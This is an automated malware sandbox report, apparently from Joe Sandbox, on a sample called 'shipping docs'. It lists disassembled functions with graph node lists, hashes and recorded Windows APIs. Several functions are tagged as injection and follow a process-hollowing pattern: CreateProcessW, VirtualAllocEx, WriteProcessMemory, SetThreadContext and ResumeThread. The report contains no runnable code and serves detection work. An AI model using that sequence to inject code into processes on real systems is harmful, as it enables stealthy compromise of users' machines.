                                                                                              control_flow_graph 2165 4482c00-4482c8b 2167 4482c8d-4482c93 2165->2167 2168 4482c96-4482c9d 2165->2168 2167->2168 2169 4482ca8-4482cbe 2168->2169 2170 4482c9f-4482ca5 2168->2170 2171 4482cc9-4482d66 CreateProcessW 2169->2171 2172 4482cc0-4482cc6 2169->2172 2170->2169 2174 4482d68-4482d6e 2171->2174 2175 4482d6f-4482de3 2171->2175 2172->2171 2174->2175 2183 4482df5-4482dfc 2175->2183 2184 4482de5-4482deb 2175->2184 2185 4482dfe-4482e0d 2183->2185 2186 4482e13 2183->2186 2184->2183 2185->2186 2187 4482e14 2186->2187 2187->2187
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04482D53
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: c63340e0be68601fc45bcf8cca51943ea0f81f3b19172a7333a4ba1302438a93
                                                                                              • Instruction ID: c30ab7a39cd7394e1b63595a5da25cce7e833ed7455a1c351ed33324dc44968a
                                                                                              • Opcode Fuzzy Hash: c63340e0be68601fc45bcf8cca51943ea0f81f3b19172a7333a4ba1302438a93
                                                                                              • Instruction Fuzzy Hash: B1510771900329DFDF24DF95C880BDEBBB5BF48304F1584AAE908A7250DB71AA85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7FA4D Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2189 b7fa4d-b7fabe 2190 b7fac0-b7fac6 2189->2190 2191 b7fac9-b7fad0 2189->2191 2190->2191 2192 b7fad2-b7fad8 2191->2192 2193 b7fadb-b7fb13 2191->2193 2192->2193 2194 b7fb1b-b7fb7a CreateWindowExW 2193->2194 2195 b7fb83-b7fbbb 2194->2195 2196 b7fb7c-b7fb82 2194->2196 2200 b7fbbd-b7fbc0 2195->2200 2201 b7fbc8 2195->2201 2196->2195 2200->2201 2202 b7fbc9 2201->2202 2202->2202
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B7FB6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 1595679dbb89ec702d5b570b00c038f66d856d69065406fa07f5b12dfaba7428
                                                                                              • Instruction ID: 7fa643928d59fa510a9dd45a2bd628b686de26aade2b10995a7d75f3192f5e5a
                                                                                              • Opcode Fuzzy Hash: 1595679dbb89ec702d5b570b00c038f66d856d69065406fa07f5b12dfaba7428
                                                                                              • Instruction Fuzzy Hash: 5051CEB1D003099FDB14CFAAC884ADEBFB5FF48314F24816AE819AB250D7709945CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7DCCC Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2203 b7dccc-b7fabe 2205 b7fac0-b7fac6 2203->2205 2206 b7fac9-b7fad0 2203->2206 2205->2206 2207 b7fad2-b7fad8 2206->2207 2208 b7fadb-b7fb7a CreateWindowExW 2206->2208 2207->2208 2210 b7fb83-b7fbbb 2208->2210 2211 b7fb7c-b7fb82 2208->2211 2215 b7fbbd-b7fbc0 2210->2215 2216 b7fbc8 2210->2216 2211->2210 2215->2216 2217 b7fbc9 2216->2217 2217->2217
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B7FB6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 12daf8036172dea68d196263af23d920e609b0dba4ccfd7dc034e70319301d40
                                                                                              • Instruction ID: 6893fdc2e7d33da4cdf19847ec5749b7e2ab1d18de67c6de40638f134b2955c9
                                                                                              • Opcode Fuzzy Hash: 12daf8036172dea68d196263af23d920e609b0dba4ccfd7dc034e70319301d40
                                                                                              • Instruction Fuzzy Hash: C351CFB1D003499FDB14CF99C884ADEBBF5FF48354F24816AE819AB250D7749845CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04A422F0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A423B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.278100258.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4a40000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 2691d35cee36f5e2a4ee9051474d3074da01aa9f333abe634db770dc1757cc5a
                                                                                              • Instruction ID: e0beb62321c2b98d911284b81acf3cac7486c57f70fd2a598304ad1b9e6f31d6
                                                                                              • Opcode Fuzzy Hash: 2691d35cee36f5e2a4ee9051474d3074da01aa9f333abe634db770dc1757cc5a
                                                                                              • Instruction Fuzzy Hash: 9041F7B5A003458FDB14CF99C488B9EBBF5FF88354F258499E519AB321D374A841CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044831A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04483235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: c90ee5a0dbb4a65e2fbeefb4c2827f45b3c59e973730b1bdee69d61538cf3b15
                                                                                              • Instruction ID: 9331c1ecfd38726555e863d6cf0275816782d92982a07baf09e674d7a7ebef67
                                                                                              • Opcode Fuzzy Hash: c90ee5a0dbb4a65e2fbeefb4c2827f45b3c59e973730b1bdee69d61538cf3b15
                                                                                              • Instruction Fuzzy Hash: 9621F2B19002499FCB10DFAAD885BDEFBF4FB48314F10842AE959A7250D378A945CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483C09 Relevance: 1.6, APIs: 1, Instructions: 66windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04483C6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 4e676ee71e94bbd9e534764cda595e2869040b6c4cf3c45d4b89f5a3eae5be2f
                                                                                              • Instruction ID: 43810aaf5b24925e4b7ac4c377257f3297bc58fe9b1917aed4118416d7d98dce
                                                                                              • Opcode Fuzzy Hash: 4e676ee71e94bbd9e534764cda595e2869040b6c4cf3c45d4b89f5a3eae5be2f
                                                                                              • Instruction Fuzzy Hash: 352134B68002498FDB20DF99D488BDEFBF4EB58724F20841EE959A7600C375A585CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B79758 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B7B71E,?,?,?,?,?), ref: 00B7B7DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: c71a1ed44948d0fdb1311f0b7e4cc40d222a3ea0b4dec575ca47552353bd8c67
                                                                                              • Instruction ID: 24de47384032ba47ea63fd039064842573aba23f8de62aa1b3fe6f9e5993b8db
                                                                                              • Opcode Fuzzy Hash: c71a1ed44948d0fdb1311f0b7e4cc40d222a3ea0b4dec575ca47552353bd8c67
                                                                                              • Instruction Fuzzy Hash: B421E4B59003499FDB10CF99D584BEEBBF4FB48324F14846AE958A7310D374A954CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044831A8 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04483235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 809edf81b596cecee492263f94a0436659e36a8f484f34a0359addd0a00bf62b
                                                                                              • Instruction ID: 9c8284d23a43369fe71637fe0a47b4c9c81c55e0478c44916e3a06f19acf646a
                                                                                              • Opcode Fuzzy Hash: 809edf81b596cecee492263f94a0436659e36a8f484f34a0359addd0a00bf62b
                                                                                              • Instruction Fuzzy Hash: 0121E0B19002599FCF10DF9AD885BDEFBF4FB48314F10842AE958A7350D778A944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7B750 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B7B71E,?,?,?,?,?), ref: 00B7B7DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 8a833c34e780bd5a69e7988b3abc505b6d4598bf2f4fddabc8075e4d1b3fa113
                                                                                              • Instruction ID: 7822b7298efbdd5f365b308ab9bd27634ad063455969ec8254c8b24dad4ec846
                                                                                              • Opcode Fuzzy Hash: 8a833c34e780bd5a69e7988b3abc505b6d4598bf2f4fddabc8075e4d1b3fa113
                                                                                              • Instruction Fuzzy Hash: 572112B69002499FDB00CFAAD584BDEFBF4FB48324F14846AE918A3310D374A945CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04482F68 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 04482FE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 2420f22e8e7375a73b79898dfd27e7276085bba92ea909846d5f5736f6244eb3
                                                                                              • Instruction ID: 644639b1f54ab9ff2eba0ce76989857d9a6ae035d798aec539a614ec72d55306
                                                                                              • Opcode Fuzzy Hash: 2420f22e8e7375a73b79898dfd27e7276085bba92ea909846d5f5736f6244eb3
                                                                                              • Instruction Fuzzy Hash: CC2113B190025A9FCB00CF9AD485BEEFBB4FB48224F14816AE418A7641D778A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483029 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 044830AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: a94043baf994872b5a3d5ac36918fa9254fcc52b8a73e111f994bfb597253b94
                                                                                              • Instruction ID: de28cb2844e4b753484de2abc2e348312523cef5e29fd0c246512941fc87c0cd
                                                                                              • Opcode Fuzzy Hash: a94043baf994872b5a3d5ac36918fa9254fcc52b8a73e111f994bfb597253b94
                                                                                              • Instruction Fuzzy Hash: 5521D0B59012599FCB10CF9AD884BDEFBF4FB49320F10842AE958A7350D379A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483030 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 044830AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 9c6cf8d5910cce794b69283269e2398a250de19683f9975d88e8ca17c71578d7
                                                                                              • Instruction ID: a38462c2c869083b5f3fd483e39ba8a10fd7978bb5902c8c074be34912f5f2a6
                                                                                              • Opcode Fuzzy Hash: 9c6cf8d5910cce794b69283269e2398a250de19683f9975d88e8ca17c71578d7
                                                                                              • Instruction Fuzzy Hash: BA21DBB59012599FCB10CF9AD884BDEBBF4FB48320F10842AE958A7250D379A944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04482F70 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 04482FE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 8cd94b052337220a5a4128c93ee31497c59e0fe15c35ffa07cb40ac44deba743
                                                                                              • Instruction ID: d1586d4db009b330cb9cf766981347efa0297e3daafe39e328bf5098800c33b1
                                                                                              • Opcode Fuzzy Hash: 8cd94b052337220a5a4128c93ee31497c59e0fe15c35ffa07cb40ac44deba743
                                                                                              • Instruction Fuzzy Hash: D921F4B1D0025A9BCB00CF9AD885B9EFBB4BB48224F14816AE518A7741D778A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044830F9 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0448316B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 62245fbd66e99c1e6dee64297a793e9cae4944b8a2d75b0d7f1c4e1cb77ccf20
                                                                                              • Instruction ID: 95f020f2c1f6d3a236838bc69526f8ccd7ceb5ed3a3c936ea0707576c0bbe932
                                                                                              • Opcode Fuzzy Hash: 62245fbd66e99c1e6dee64297a793e9cae4944b8a2d75b0d7f1c4e1cb77ccf20
                                                                                              • Instruction Fuzzy Hash: 702156B18043889FCB11CF99C884BDEBFF4EF4A724F14845AE958A7251C375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B793CC Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B79809,00000800,00000000,00000000), ref: 00B79A1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 0701fd57303665962b224a2a90c0d23153ba49522d18b23b69362a846cdc531d
                                                                                              • Instruction ID: 3d782916fb485f485a394d1f5bf6f08cfa3c251a7e638111eec5ec4f5036e16f
                                                                                              • Opcode Fuzzy Hash: 0701fd57303665962b224a2a90c0d23153ba49522d18b23b69362a846cdc531d
                                                                                              • Instruction Fuzzy Hash: 4C11F2B29002499BDB10CF9AD484ADEFBF4EB48364F14846AE969A7200C374A945CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B799A8 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B79809,00000800,00000000,00000000), ref: 00B79A1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: d6d4956c5c01fb64e43ea29cc9458d61d47bbf6c3f7b4a0c00d838c4a23671dc
                                                                                              • Instruction ID: f856d19675ebfd4c5a34da249f84958fc820bb0009921aca3211f53fc2e698cc
                                                                                              • Opcode Fuzzy Hash: d6d4956c5c01fb64e43ea29cc9458d61d47bbf6c3f7b4a0c00d838c4a23671dc
                                                                                              • Instruction Fuzzy Hash: BF1112B28002498FCB10CF9AD484BDEFBF4EB88324F14846AD569B7200C375A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7FC99 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00B7FC88,?,?,?,?), ref: 00B7FCFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: bc009be1a79ccd195b39c086b600899fd4af3502bb8558fe775e901a3e451b4e
                                                                                              • Instruction ID: edd68dfbdf481190341cb4092d18c5852c2bb678507b498af65909b79617231b
                                                                                              • Opcode Fuzzy Hash: bc009be1a79ccd195b39c086b600899fd4af3502bb8558fe775e901a3e451b4e
                                                                                              • Instruction Fuzzy Hash: DD1125B58002498FDB10CF99D585BDEFBF4EB48324F20841AD818A7300C3B4AA45CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483100 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0448316B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: ff9a5479aac0ba769fb74f7617e9aed49327fbe0cd0021b30c1e5d1882fb5df4
                                                                                              • Instruction ID: c2157047578c3ded13903cd4dfe93f5ca5fb0c743807d06533f8e7ff8cb16c8f
                                                                                              • Opcode Fuzzy Hash: ff9a5479aac0ba769fb74f7617e9aed49327fbe0cd0021b30c1e5d1882fb5df4
                                                                                              • Instruction Fuzzy Hash: 9411E0B59002499FCB10DF9AD884BDFBBF4FB48724F14841AE968A7250C375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B79328 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7938E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 953e2f79bec56184cddcbad05eaffd05f2b6566060d916c6300ee04683e0adec
                                                                                              • Instruction ID: f84fbeee898c8e22ee6cd9adff1d7643c3b49961153a3c5c74da20971382507d
                                                                                              • Opcode Fuzzy Hash: 953e2f79bec56184cddcbad05eaffd05f2b6566060d916c6300ee04683e0adec
                                                                                              • Instruction Fuzzy Hash: FB110FB2C002498FCB10CF9AD444BDEFBF4EB88324F15846AD429A7640C374A545CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7DD04 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00B7FC88,?,?,?,?), ref: 00B7FCFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 64dca840cbbae746878c84da090e01a967e39f907371c24bb137a1f569e338e1
                                                                                              • Instruction ID: 902fdbd69abecc1d7f04fc5f088a069c0e8454aa0a2aecbc7fa12e0705d8418a
                                                                                              • Opcode Fuzzy Hash: 64dca840cbbae746878c84da090e01a967e39f907371c24bb137a1f569e338e1
                                                                                              • Instruction Fuzzy Hash: D5110AB58003499FDB10CF99D584BDEFBF8EB48324F14845AD955A7340C3B4A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483359 Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: f0eac682efb203eb336d04fdd7eac1930c8cf26bdfa7a360a9a086f3fe8b0d1d
                                                                                              • Instruction ID: 225a3e706f31081ed5045c8ebe3e61eea1546f9a000a48c3fc372d259b496775
                                                                                              • Opcode Fuzzy Hash: f0eac682efb203eb336d04fdd7eac1930c8cf26bdfa7a360a9a086f3fe8b0d1d
                                                                                              • Instruction Fuzzy Hash: 611133B59002498FCB10CF99D484BDEBBF4EB48324F24881AD959A7300C775A941CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483C10 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04483C6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 6aa8931f93f382fd7a4ffed631d4a62bc2988a452b4dd7464ced2862b697e7be
                                                                                              • Instruction ID: 6037160ebe3f41af667e405ab12d2d7c44c7d9fc891a90980e5e4b1492f51ee8
                                                                                              • Opcode Fuzzy Hash: 6aa8931f93f382fd7a4ffed631d4a62bc2988a452b4dd7464ced2862b697e7be
                                                                                              • Instruction Fuzzy Hash: 2311D0B58003499FDB10DF99D888BDFBBF8EB58724F14841AE955A7600C375A984CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483360 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 0a9d3a7240f42bd7824e25c1c299bc899a25b51f6360eaee97cf782a5a7b1ce3
                                                                                              • Instruction ID: 2742cce919fbf0b9d23d055b03dce96e702a8ff2853e1f64808c753d074797a5
                                                                                              • Opcode Fuzzy Hash: 0a9d3a7240f42bd7824e25c1c299bc899a25b51f6360eaee97cf782a5a7b1ce3
                                                                                              • Instruction Fuzzy Hash: 0E1112B18002498FCB10DF9AD488BDFFBF4EB48324F20841AD559A7740C775A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0097D4A0 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265063261.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
